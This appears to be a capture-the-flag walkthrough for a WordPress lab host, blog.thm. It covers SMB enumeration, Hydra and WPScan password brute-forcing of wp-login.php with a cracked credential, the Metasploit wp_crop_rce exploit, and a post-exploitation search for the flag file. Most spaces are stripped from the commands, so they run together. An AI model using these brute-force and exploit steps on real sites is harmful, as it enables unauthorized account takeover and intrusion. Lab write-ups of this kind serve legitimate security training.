nmap-p445--scriptsmb-protocolsblog.thm|smb-protocols:|dialects:|NTLM0.12 (SMBv1) [dangerous, but default]|202|210|300|302|_311smbmap-uguest-p""-d.-Hblog.thmsmbclient-Lblog.thm-Nsmbclient//blog.thm/BillySMB-Ngetcheck-this.png# This looks like a rabbit hole
This module exploits a path traversal and a local file inclusion vulnerability on WordPress versions 5.0.0 and <= 4.9.8. The crop-image function allows a user, with at least author privileges, to resize an image and perform a path traversal by changing the _wp_attached_file reference during the upload. The second part of the exploit will include this image in the current theme by changing the _wp_page_template attribute when creating a post.
Since Karen Wheeler has author access to the blog, brute force the user kwheel.
Navigate to http://blog.thm/wp-login.php and try a password with user kwheel. Copy the HTTP POST request in raw format, it is necessary for the Hydra command.
hydra-lkwheel-P/usr/share/wordlists/rockyou.txtblog.thmhttp-post-form"/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log+In&redirect_to=http%3A%2F%2F10.10.54.35%2Fwp-admin%2F&testcookie=1:F=The password you entered for the username"-V# Third string is the test condition, F: = test for failure. String got from the HTTP response.# WPScanecho-e'kwheel'>user.txtwpscan--urlhttp://blog.thm-P/usr/share/wordlists/rockyou.txt-Uuser.txt-t75
đ kwheeler:cutiepie1
Exploitation
Use Metasploit with module exploit/multi/http/wp_crop_rce
shellscript-qc/bin/bash/dev/nullfind/-typef-inameuser.txt2>/dev/nullls/home/bjoel/cat/home/bjoel/user.txtYouwon't find what you'relookingforhere.TRYHARDERexit# to exit the shell